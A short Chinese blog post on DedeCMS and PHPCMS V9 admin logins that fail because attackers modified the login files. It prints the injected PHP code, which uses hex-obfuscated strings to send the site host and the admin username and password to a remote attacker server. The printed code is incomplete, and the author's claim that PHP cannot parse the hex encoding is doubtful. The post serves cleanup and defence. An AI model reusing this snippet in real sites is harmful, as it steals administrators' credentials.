以沫 织梦phpcms网站受攻击,网站后台登录不进去解决方法
之前发现一个服务器的所有网站都出现了后台登陆不进去的情况,本来以为是服务器内存,cpu或者宽带的原因,可是都很正常,为什么登陆不进去呢?不程序下载到本地就正常了,真奇怪,最终找了一天终于找到了,原来是登陆文件让黑客给修改了,原来是登陆用户名密码让转码成16进制数了,php解析不了,再本地系统有默认的这个编码表,当然能解析了,所以正常;
织梦网站:/include/userlogin.class.php
Phpcms V9:/phpcms/modules/admin/index.php
找个新文件替换下就可以了;
如下是攻击代码:
$sqlhost = “x77x77x77x2ex74x68x69x73x64x6fx6fx72x2ex63x6fx6d”;
$sqlself = “x2fx69x6ex2fx61x70x69x2ex70x68x70”;
$sqlself .= “x3fx76x61x72x3dx64x65x64x65x26x64x61x74x61x3d”;
$sqlself .= bin2hex($_SERVER[“x48x54x54x50x5fx48x4fx53x54”]).’|’.bin2hex($_SERVER[“x50x48x50x5fx53x45x4cx46”]).’|’;
$sqlself .= bin2hex($username).’|’.bin2hex($userpwd);
$sqlport = hexdec(50);
if(function_exists(“x66x73x6fx63x6bx6fx70x65x6e”)) {
$sqlfp = @fsockopen ($sqlhost, $sqlport);
@fputs ($sqlfp, “x47x45x54x20″.$sqlself.”x20x48x54x54x50x2fx31x2ex31
x48x6fx73x74x3a”.$sqlhost.”
x43x6fx6ex6ex65x63x74x69x6fx6ex3ax20x43x6cx6fx73x65
”);
@fclose ($sqlfp);
} else {
$context = array(“x68x74x74x70” => array(“x6dx65x74x68x6fx64” => “x47x45x54″,”x74x69x6dx65x6fx75x74” => 5));
if(function_exists(‘stream_context_create’)) { $stream = @stream_context_create ($context); }
@file_get_contents (“x68x74x74x70x3ax2fx2f”.$sqlhost.”x3a”.$sqlport.$sqlself, false, $stream);
☉本站提供的源码、模板、软件工具等其他资源,都不包含技术服务,请大家谅解!
pbootcms模板网 » 织梦phpcms网站受攻击,网站后台登录不进去解决方法
